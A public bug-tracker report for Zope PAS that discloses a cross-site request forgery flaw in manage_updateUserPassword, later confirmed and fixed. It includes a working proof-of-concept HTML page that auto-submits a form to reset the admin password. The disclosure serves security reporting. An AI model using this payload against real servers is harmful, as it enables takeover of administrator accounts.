userManager manage_updateUserPassword csrf

Bug #1079204 reported by Thomas
256
This bug affects 1 person
Affects Status Importance Assigned to Milestone
Zope PAS
Undecided
Tres Seaver

Bug Description

Following html allows the admin passwd to be reset :

<html>
  <body>
<form action="https://SERVER/acl_users/userManager/manage_updateUserPassword" method="post" name="form">
 user_id : <input value="admin" name="user_id">
  <br>
  password: <input value="zenoss26" name="password">
  <br>
  confirm :<input value="zenoss26" name="confirm">
  <br>
 <input type="submit">
</form>
<script>
document.forms["form"].submit();
</script>
  </body>
</html>

Tres Seaver (tseaver)
Changed in zope-pas:
assignee: nobody → Tres Seaver (tseaver)
status: New → Confirmed
Revision history for this message
Tres Seaver (tseaver) wrote :
Changed in zope-pas:
status: Confirmed → Fix Committed
Tres Seaver (tseaver)
Changed in zope-pas:
status: Fix Committed → Fix Released
information type: Private Security → Public Security
To post a comment you must log in.
This report contains Public Security information  Edit
Everyone can see this security related information.

Other bug subscribers